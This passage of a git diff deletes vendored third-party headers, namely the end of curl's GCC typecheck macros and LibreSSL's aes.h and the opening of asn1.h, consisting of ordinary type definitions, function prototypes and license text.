-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_sockopt_callback) ||                \
-   _curl_callback_compatible((expr), _curl_sockopt_callback1) ||              \
-   _curl_callback_compatible((expr), _curl_sockopt_callback2))
-typedef int (*_curl_sockopt_callback1)(void *, curl_socket_t, curlsocktype);
-typedef int (*_curl_sockopt_callback2)(const void *, curl_socket_t,
-                                      curlsocktype);
-
-/* evaluates to true if expr is of type curl_opensocket_callback or
-   "similar" */
-#define _curl_is_opensocket_cb(expr)                                    \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_opensocket_callback) ||             \
-   _curl_callback_compatible((expr), _curl_opensocket_callback1) ||           \
-   _curl_callback_compatible((expr), _curl_opensocket_callback2) ||           \
-   _curl_callback_compatible((expr), _curl_opensocket_callback3) ||           \
-   _curl_callback_compatible((expr), _curl_opensocket_callback4))
-typedef curl_socket_t (*_curl_opensocket_callback1)
-  (void *, curlsocktype, struct curl_sockaddr *);
-typedef curl_socket_t (*_curl_opensocket_callback2)
-  (void *, curlsocktype, const struct curl_sockaddr *);
-typedef curl_socket_t (*_curl_opensocket_callback3)
-  (const void *, curlsocktype, struct curl_sockaddr *);
-typedef curl_socket_t (*_curl_opensocket_callback4)
-  (const void *, curlsocktype, const struct curl_sockaddr *);
-
-/* evaluates to true if expr is of type curl_progress_callback or "similar" */
-#define _curl_is_progress_cb(expr)                                      \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_progress_callback) ||               \
-   _curl_callback_compatible((expr), _curl_progress_callback1) ||             \
-   _curl_callback_compatible((expr), _curl_progress_callback2))
-typedef int (*_curl_progress_callback1)(void *,
-    double, double, double, double);
-typedef int (*_curl_progress_callback2)(const void *,
-    double, double, double, double);
-
-/* evaluates to true if expr is of type curl_debug_callback or "similar" */
-#define _curl_is_debug_cb(expr)                                         \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_debug_callback) ||                  \
-   _curl_callback_compatible((expr), _curl_debug_callback1) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback2) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback3) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback4) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback5) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback6) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback7) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback8))
-typedef int (*_curl_debug_callback1) (CURL *,
-    curl_infotype, char *, size_t, void *);
-typedef int (*_curl_debug_callback2) (CURL *,
-    curl_infotype, char *, size_t, const void *);
-typedef int (*_curl_debug_callback3) (CURL *,
-    curl_infotype, const char *, size_t, void *);
-typedef int (*_curl_debug_callback4) (CURL *,
-    curl_infotype, const char *, size_t, const void *);
-typedef int (*_curl_debug_callback5) (CURL *,
-    curl_infotype, unsigned char *, size_t, void *);
-typedef int (*_curl_debug_callback6) (CURL *,
-    curl_infotype, unsigned char *, size_t, const void *);
-typedef int (*_curl_debug_callback7) (CURL *,
-    curl_infotype, const unsigned char *, size_t, void *);
-typedef int (*_curl_debug_callback8) (CURL *,
-    curl_infotype, const unsigned char *, size_t, const void *);
-
-/* evaluates to true if expr is of type curl_ssl_ctx_callback or "similar" */
-/* this is getting even messier... */
-#define _curl_is_ssl_ctx_cb(expr)                                       \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_ssl_ctx_callback) ||                \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback1) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback2) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback3) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback4) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback5) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback6) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback7) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback8))
-typedef CURLcode (*_curl_ssl_ctx_callback1)(CURL *, void *, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback2)(CURL *, void *, const void *);
-typedef CURLcode (*_curl_ssl_ctx_callback3)(CURL *, const void *, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback4)(CURL *, const void *,
-                                            const void *);
-#ifdef HEADER_SSL_H
-/* hack: if we included OpenSSL's ssl.h, we know about SSL_CTX
- * this will of course break if we're included before OpenSSL headers...
- */
-typedef CURLcode (*_curl_ssl_ctx_callback5)(CURL *, SSL_CTX, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback6)(CURL *, SSL_CTX, const void *);
-typedef CURLcode (*_curl_ssl_ctx_callback7)(CURL *, const SSL_CTX, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback8)(CURL *, const SSL_CTX,
-                                           const void *);
-#else
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback5;
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback6;
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback7;
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback8;
-#endif
-
-/* evaluates to true if expr is of type curl_conv_callback or "similar" */
-#define _curl_is_conv_cb(expr)                                          \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_conv_callback) ||                   \
-   _curl_callback_compatible((expr), _curl_conv_callback1) ||                 \
-   _curl_callback_compatible((expr), _curl_conv_callback2) ||                 \
-   _curl_callback_compatible((expr), _curl_conv_callback3) ||                 \
-   _curl_callback_compatible((expr), _curl_conv_callback4))
-typedef CURLcode (*_curl_conv_callback1)(char *, size_t length);
-typedef CURLcode (*_curl_conv_callback2)(const char *, size_t length);
-typedef CURLcode (*_curl_conv_callback3)(void *, size_t length);
-typedef CURLcode (*_curl_conv_callback4)(const void *, size_t length);
-
-/* evaluates to true if expr is of type curl_seek_callback or "similar" */
-#define _curl_is_seek_cb(expr)                                          \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_seek_callback) ||                   \
-   _curl_callback_compatible((expr), _curl_seek_callback1) ||                 \
-   _curl_callback_compatible((expr), _curl_seek_callback2))
-typedef CURLcode (*_curl_seek_callback1)(void *, curl_off_t, int);
-typedef CURLcode (*_curl_seek_callback2)(const void *, curl_off_t, int);
-
-
-#endif /* __CURL_TYPECHECK_GCC_H */
diff --git a/thirdparty/libressl/include/openssl/aes.h b/thirdparty/libressl/include/openssl/aes.h
deleted file mode 100644
index c904485..0000000
--- a/thirdparty/libressl/include/openssl/aes.h
+++ /dev/null
@@ -1,126 +0,0 @@
-/* $OpenBSD: aes.h,v 1.14 2014/07/09 09:10:07 miod Exp $ */
-/* ====================================================================
- * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- */
-
-#ifndef HEADER_AES_H
-#define HEADER_AES_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_AES
-#error AES is disabled.
-#endif
-
-#include <stddef.h>
-
-#define AES_ENCRYPT	1
-#define AES_DECRYPT	0
-
-/* Because array size can't be a const in C, the following two are macros.
-   Both sizes are in bytes. */
-#define AES_MAXNR 14
-#define AES_BLOCK_SIZE 16
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* This should be a hidden type, but EVP requires that the size be known */
-struct aes_key_st {
-	unsigned int rd_key[4 *(AES_MAXNR + 1)];
-	int rounds;
-};
-typedef struct aes_key_st AES_KEY;
-
-const char *AES_options(void);
-
-int AES_set_encrypt_key(const unsigned char *userKey, const int bits,
-    AES_KEY *key);
-int AES_set_decrypt_key(const unsigned char *userKey, const int bits,
-    AES_KEY *key);
-
-void AES_encrypt(const unsigned char *in, unsigned char *out,
-    const AES_KEY *key);
-void AES_decrypt(const unsigned char *in, unsigned char *out,
-    const AES_KEY *key);
-
-void AES_ecb_encrypt(const unsigned char *in, unsigned char *out,
-    const AES_KEY *key, const int enc);
-void AES_cbc_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, const int enc);
-void AES_cfb128_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num,
-    const int enc);
-void AES_cfb1_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num,
-    const int enc);
-void AES_cfb8_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num,
-    const int enc);
-void AES_ofb128_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num);
-void AES_ctr128_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char ivec[AES_BLOCK_SIZE],
-    unsigned char ecount_buf[AES_BLOCK_SIZE], unsigned int *num);
-/* NB: the IV is _two_ blocks long */
-void AES_ige_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, const int enc);
-
-int AES_wrap_key(AES_KEY *key, const unsigned char *iv, unsigned char *out,
-    const unsigned char *in, unsigned int inlen);
-int AES_unwrap_key(AES_KEY *key, const unsigned char *iv, unsigned char *out,
-    const unsigned char *in, unsigned int inlen);
-
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* !HEADER_AES_H */
diff --git a/thirdparty/libressl/include/openssl/asn1.h b/thirdparty/libressl/include/openssl/asn1.h
deleted file mode 100644
index da16d5c..0000000
--- a/thirdparty/libressl/include/openssl/asn1.h
+++ /dev/null
@@ -1,1460 +0,0 @@
-/* $OpenBSD: asn1.h,v 1.43 2017/05/06 17:12:59 beck Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_ASN1_H
-#define HEADER_ASN1_H
-
-#include <time.h>
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/safestack.h>
-
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define V_ASN1_UNIVERSAL		0x00
-#define	V_ASN1_APPLICATION		0x40
-#define V_ASN1_CONTEXT_SPECIFIC		0x80
-#define V_ASN1_PRIVATE			0xc0
-
-#define V_ASN1_CONSTRUCTED		0x20
-#define V_ASN1_PRIMITIVE_TAG		0x1f
-#define V_ASN1_PRIMATIVE_TAG		0x1f
-
-#define V_ASN1_APP_CHOOSE		-2	/* let the recipient choose */
-#define V_ASN1_OTHER			-3	/* used in ASN1_TYPE */
-#define V_ASN1_ANY			-4	/* used in ASN1 template code */
-
-#define V_ASN1_NEG			0x100	/* negative flag */
-
-#define V_ASN1_UNDEF			-1
-#define V_ASN1_EOC			0
-#define V_ASN1_BOOLEAN			1	/**/
-#define V_ASN1_INTEGER			2
-#define V_ASN1_NEG_INTEGER		(2 | V_ASN1_NEG)
-#define V_ASN1_BIT_STRING		3
-#define V_ASN1_OCTET_STRING		4
-#define V_ASN1_NULL			5
-#define V_ASN1_OBJECT			6
-#define V_ASN1_OBJECT_DESCRIPTOR	7
-#define V_ASN1_EXTERNAL			8
-#define V_ASN1_REAL			9
-#define V_ASN1_ENUMERATED		10
-#define V_ASN1_NEG_ENUMERATED		(10 | V_ASN1_NEG)
-#define V_ASN1_UTF8STRING		12
-#define V_ASN1_SEQUENCE			16
-#define V_ASN1_SET			17
-#define V_ASN1_NUMERICSTRING		18	/**/
-#define V_ASN1_PRINTABLESTRING		19
-#define V_ASN1_T61STRING		20
-#define V_ASN1_TELETEXSTRING		20	/* alias */
-#define V_ASN1_VIDEOTEXSTRING		21	/**/
-#define V_ASN1_IA5STRING		22
-#define V_ASN1_UTCTIME			23
-#define V_ASN1_GENERALIZEDTIME		24	/**/
-#define V_ASN1_GRAPHICSTRING		25	/**/
-#define V_ASN1_ISO64STRING		26	/**/
-#define V_ASN1_VISIBLESTRING		26	/* alias */
-#define V_ASN1_GENERALSTRING		27	/**/
-#define V_ASN1_UNIVERSALSTRING		28	/**/
-#define V_ASN1_BMPSTRING		30
-
-/* For use with d2i_ASN1_type_bytes() */
-#define B_ASN1_NUMERICSTRING	0x0001
-#define B_ASN1_PRINTABLESTRING	0x0002
-#define B_ASN1_T61STRING	0x0004
-#define B_ASN1_TELETEXSTRING	0x0004
-#define B_ASN1_VIDEOTEXSTRING	0x0008
-#define B_ASN1_IA5STRING	0x0010
-#define B_ASN1_GRAPHICSTRING	0x0020
-#define B_ASN1_ISO64STRING	0x0040
-#define B_ASN1_VISIBLESTRING	0x0040
-#define B_ASN1_GENERALSTRING	0x0080
-#define B_ASN1_UNIVERSALSTRING	0x0100
-#define B_ASN1_OCTET_STRING	0x0200
-#define B_ASN1_BIT_STRING	0x0400
-#define B_ASN1_BMPSTRING	0x0800
-#define B_ASN1_UNKNOWN		0x1000
-#define B_ASN1_UTF8STRING	0x2000
-#define B_ASN1_UTCTIME		0x4000
-#define B_ASN1_GENERALIZEDTIME	0x8000
-#define B_ASN1_SEQUENCE		0x10000
-
-/* For use with ASN1_mbstring_copy() */
-#define MBSTRING_FLAG		0x1000
-#define MBSTRING_UTF8		(MBSTRING_FLAG)
-#define MBSTRING_ASC		(MBSTRING_FLAG|1)
-#define MBSTRING_BMP		(MBSTRING_FLAG|2)
-#define MBSTRING_UNIV		(MBSTRING_FLAG|4)
-
-#define SMIME_OLDMIME		0x400
-#define SMIME_CRLFEOL		0x800
-#define SMIME_STREAM		0x1000
-
-struct X509_algor_st;
-DECLARE_STACK_OF(X509_ALGOR)
-
-#define DECLARE_ASN1_SET_OF(type) /* filled in by mkstack.pl */
-#define IMPLEMENT_ASN1_SET_OF(type) /* nothing, no longer needed */
-
-/* We MUST make sure that, except for constness, asn1_ctx_st and
-   asn1_const_ctx are exactly the same.  Fortunately, as soon as
-   the old ASN1 parsing macros are gone, we can throw this away
-   as well... */
-typedef struct asn1_ctx_st {
-	unsigned char *p;/* work char pointer */
-	int eos;	/* end of sequence read for indefinite encoding */
-	int error;	/* error code to use when returning an error */
-	int inf;	/* constructed if 0x20, indefinite is 0x21 */
-	int tag;	/* tag from last 'get object' */
-	int xclass;	/* class from last 'get object' */
-	long slen;	/* length of last 'get object' */
-	unsigned char *max; /* largest value of p allowed */
-	unsigned char *q;/* temporary variable */
-	unsigned char **pp;/* variable */
-	int line;	/* used in error processing */
-} ASN1_CTX;
-
-typedef struct asn1_const_ctx_st {
-	const unsigned char *p;/* work char pointer */
-	int eos;	/* end of sequence read for indefinite encoding */
-	int error;	/* error code to use when returning an error */
-	int inf;	/* constructed if 0x20, indefinite is 0x21 */
-	int tag;	/* tag from last 'get object' */
-	int xclass;	/* class from last 'get object' */
-	long slen;	/* length of last 'get object' */
-	const unsigned char *max; /* largest value of p allowed */
-	const unsigned char *q;/* temporary variable */
-	const unsigned char **pp;/* variable */
-	int line;	/* used in error processing */
-} ASN1_const_CTX;
-
-/* These are used internally in the ASN1_OBJECT to keep track of
- * whether the names and data need to be free()ed */
-#define ASN1_OBJECT_FLAG_DYNAMIC	 0x01	/* internal use */
-#define ASN1_OBJECT_FLAG_CRITICAL	 0x02	/* critical x509v3 object id */
-#define ASN1_OBJECT_FLAG_DYNAMIC_STRINGS 0x04	/* internal use */
-#define ASN1_OBJECT_FLAG_DYNAMIC_DATA 	 0x08	/* internal use */
-typedef struct asn1_object_st {
-	const char *sn, *ln;
-	int nid;
-	int length;
-	const unsigned char *data;	/* data remains const after init */
-	int flags;	/* Should we free this one */
-} ASN1_OBJECT;
-
-#define ASN1_STRING_FLAG_BITS_LEFT 0x08 /* Set if 0x07 has bits left value */
-/* This indicates that the ASN1_STRING is not a real value but just a place
- * holder for the location where indefinite length constructed data should
- * be inserted in the memory buffer
- */
-#define ASN1_STRING_FLAG_NDEF 0x010
-
-/* This flag is used by the CMS code to indicate that a string is not
- * complete and is a place holder for content when it had all been
- * accessed. The flag will be reset when content has been written to it.
- */
-
-#define ASN1_STRING_FLAG_CONT 0x020
-/* This flag is used by ASN1 code to indicate an ASN1_STRING is an MSTRING
- * type.
- */
-#define ASN1_STRING_FLAG_MSTRING 0x040
-/* This is the base type that holds just about everything :-) */
-struct asn1_string_st {
-	int length;
-	int type;
-	unsigned char *data;
-	/* The value of the following field depends on the type being
-	 * held.  It is mostly being used for BIT_STRING so if the
-	 * input data has a non-zero 'unused bits' value, it will be
-	 * handled correctly */
-	long flags;
-};
-
-/* ASN1_ENCODING structure: this is used to save the received
- * encoding of an ASN1 type. This is useful to get round
- * problems with invalid encodings which can break signatures.
- */
-
-typedef struct ASN1_ENCODING_st {
-	unsigned char *enc;	/* DER encoding */
-	long len;		/* Length of encoding */
-	int modified;		 /* set to 1 if 'enc' is invalid */
-} ASN1_ENCODING;
-
-/* Used with ASN1 LONG type: if a long is set to this it is omitted */
-#define ASN1_LONG_UNDEF	0x7fffffffL
-
-#define STABLE_FLAGS_MALLOC	0x01
-#define STABLE_NO_MASK		0x02
-#define DIRSTRING_TYPE	\
- (B_ASN1_PRINTABLESTRING|B_ASN1_T61STRING|B_ASN1_BMPSTRING|B_ASN1_UTF8STRING)
-#define PKCS9STRING_TYPE (DIRSTRING_TYPE|B_ASN1_IA5STRING)
-
-typedef struct asn1_string_table_st {
-	int nid;
-	long minsize;
-	long maxsize;
-	unsigned long mask;
-	unsigned long flags;
-} ASN1_STRING_TABLE;
-
-DECLARE_STACK_OF(ASN1_STRING_TABLE)
-
-/* size limits: this stuff is taken straight from RFC2459 */
-
-#define ub_name				32768
-#define ub_common_name			64
-#define ub_locality_name		128
-#define ub_state_name			128
-#define ub_organization_name		64
-#define ub_organization_unit_name	64
-#define ub_title			64
-#define ub_email_address		128
-
-/* Declarations for template structures: for full definitions
- * see asn1t.h
- */
-typedef struct ASN1_TEMPLATE_st ASN1_TEMPLATE;
-typedef struct ASN1_TLC_st ASN1_TLC;
-/* This is just an opaque pointer */
-typedef struct ASN1_VALUE_st ASN1_VALUE;
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Declare ASN1 functions: the implement macro in in asn1t.h */
-
-#define DECLARE_ASN1_FUNCTIONS(type) DECLARE_ASN1_FUNCTIONS_name(type, type)
-
-#define DECLARE_ASN1_ALLOC_FUNCTIONS(type) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, type)
-
-#define DECLARE_ASN1_FUNCTIONS_name(type, name) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
-	DECLARE_ASN1_ENCODE_FUNCTIONS(type, name, name)
-
-#define DECLARE_ASN1_FUNCTIONS_fname(type, itname, name) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
-	DECLARE_ASN1_ENCODE_FUNCTIONS(type, itname, name)
-
-#define	DECLARE_ASN1_ENCODE_FUNCTIONS(type, itname, name) \
-	type *d2i_##name(type **a, const unsigned char **in, long len); \
-	int i2d_##name(type *a, unsigned char **out); \
-	DECLARE_ASN1_ITEM(itname)
-
-#define	DECLARE_ASN1_ENCODE_FUNCTIONS_const(type, name) \
-	type *d2i_##name(type **a, const unsigned char **in, long len); \
-	int i2d_##name(const type *a, unsigned char **out); \
-	DECLARE_ASN1_ITEM(name)
-
-#define	DECLARE_ASN1_NDEF_FUNCTION(name) \
-	int i2d_##name##_NDEF(name *a, unsigned char **out);
-
-#define DECLARE_ASN1_FUNCTIONS_const(name) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS(name) \
-	DECLARE_ASN1_ENCODE_FUNCTIONS_const(name, name)
-
-#define DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
-	type *name##_new(void); \
-	void name##_free(type *a);
-
-#define DECLARE_ASN1_PRINT_FUNCTION(stname) \
-	DECLARE_ASN1_PRINT_FUNCTION_fname(stname, stname)
-
-#define DECLARE_ASN1_PRINT_FUNCTION_fname(stname, fname) \
-	int fname##_print_ctx(BIO *out, stname *x, int indent, \
-					 const ASN1_PCTX *pctx);
-
-#endif /* !LIBRESSL_INTERNAL */
-
-#define D2I_OF(type) type *(*)(type **,const unsigned char **,long)
-#define I2D_OF(type) int (*)(type *,unsigned char **)
-#define I2D_OF_const(type) int (*)(const type *,unsigned char **)
-
-#define CHECKED_D2I_OF(type, d2i) \
-    ((d2i_of_void*) (1 ? d2i : ((D2I_OF(type))0)))
-#define CHECKED_I2D_OF(type, i2d) \
-    ((i2d_of_void*) (1 ? i2d : ((I2D_OF(type))0)))
-#define CHECKED_NEW_OF(type, xnew) \
-    ((void *(*)(void)) (1 ? xnew : ((type *(*)(void))0)))
-#define CHECKED_PTR_OF(type, p) \
-    ((void*) (1 ? p : (type*)0))
-#define CHECKED_PPTR_OF(type, p) \
-    ((void**) (1 ? p : (type**)0))
-
-#define TYPEDEF_D2I_OF(type) typedef type *d2i_of_##type(type **,const unsigned char **,long)
-#define TYPEDEF_I2D_OF(type) typedef int i2d_of_##type(type *,unsigned char **)
-#define TYPEDEF_D2I2D_OF(type) TYPEDEF_D2I_OF(type); TYPEDEF_I2D_OF(type)
-
-TYPEDEF_D2I2D_OF(void);
-
-/* The following macros and typedefs allow an ASN1_ITEM
- * to be embedded in a structure and referenced. Since
- * the ASN1_ITEM pointers need to be globally accessible
- * (possibly from shared libraries) they may exist in
- * different forms. On platforms that support it the
- * ASN1_ITEM structure itself will be globally exported.
- * Other platforms will export a function that returns
- * an ASN1_ITEM pointer.
- *
- * To handle both cases transparently the macros below
- * should be used instead of hard coding an ASN1_ITEM
- * pointer in a structure.
- *
- * The structure will look like this:
- *
- * typedef struct SOMETHING_st {
- *      ...
- *      ASN1_ITEM_EXP *iptr;
- *      ...
- * } SOMETHING;
- *
- * It would be initialised as e.g.:
- *
- * SOMETHING somevar = {...,ASN1_ITEM_ref(X509),...};
- *
- * and the actual pointer extracted with:
- *
- * const ASN1_ITEM *it = ASN1_ITEM_ptr(somevar.iptr);
- *
- * Finally an ASN1_ITEM pointer can be extracted from an
- * appropriate reference with: ASN1_ITEM_rptr(X509). This
- * would be used when a function takes an ASN1_ITEM * argument.
- *
- */
-
-/* ASN1_ITEM pointer exported type */
-typedef const ASN1_ITEM ASN1_ITEM_EXP;
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Macro to obtain ASN1_ITEM pointer from exported type */
-#define ASN1_ITEM_ptr(iptr) (iptr)
-
-/* Macro to include ASN1_ITEM pointer from base type */
-#define ASN1_ITEM_ref(iptr) (&(iptr##_it))
-
-#define ASN1_ITEM_rptr(ref) (&(ref##_it))
-
-#define DECLARE_ASN1_ITEM(name) \
-	extern const ASN1_ITEM name##_it;
-
-#endif /* !LIBRESSL_INTERNAL */
-
-/* Parameters used by ASN1_STRING_print_ex() */
-
-/* These determine which characters to escape:
- * RFC2253 special characters, control characters and
- * MSB set characters
- */
-
-#define ASN1_STRFLGS_ESC_2253		1
-#define ASN1_STRFLGS_ESC_CTRL		2
-#define ASN1_STRFLGS_ESC_MSB		4
-
-
-/* This flag determines how we do escaping: normally
- * RC2253 backslash only, set this to use backslash and
- * quote.
- */
-
-#define ASN1_STRFLGS_ESC_QUOTE		8
-
-
-/* These three flags are internal use only. */
-
-/* Character is a valid PrintableString character */
-#define CHARTYPE_PRINTABLESTRING	0x10
-/* Character needs escaping if it is the first character */
-#define CHARTYPE_FIRST_ESC_2253		0x20
-/* Character needs escaping if it is the last character */
-#define CHARTYPE_LAST_ESC_2253		0x40
-
-/* NB the internal flags are safely reused below by flags
- * handled at the top level.
- */
-
-/* If this is set we convert all character strings
- * to UTF8 first
- */
-
-#define ASN1_STRFLGS_UTF8_CONVERT	0x10
-
-/* If this is set we don't attempt to interpret content:
- * just assume all strings are 1 byte per character. This
- * will produce some pretty odd looking output!
- */
-
-#define ASN1_STRFLGS_IGNORE_TYPE	0x20
-
-/* If this is set we include the string type in the output */
-#define ASN1_STRFLGS_SHOW_TYPE		0x40
-
-/* This determines which strings to display and which to
- * 'dump' (hex dump of content octets or DER encoding). We can
- * only dump non character strings or everything. If we
- * don't dump 'unknown' they are interpreted as character
- * strings with 1 octet per character and are subject to
- * the usual escaping options.
- */
-
-#define ASN1_STRFLGS_DUMP_ALL		0x80
-#define ASN1_STRFLGS_DUMP_UNKNOWN	0x100
-
-/* These determine what 'dumping' does, we can dump the
- * content octets or the DER encoding: both use the
- * RFC2253 #NNNNN notation.
- */
-
-#define ASN1_STRFLGS_DUMP_DER		0x200
-
-/* All the string flags consistent with RFC2253,
- * escaping control characters isn't essential in
- * RFC2253 but it is advisable anyway.
- */
-
-#define ASN1_STRFLGS_RFC2253	(ASN1_STRFLGS_ESC_2253 | \
-				ASN1_STRFLGS_ESC_CTRL | \
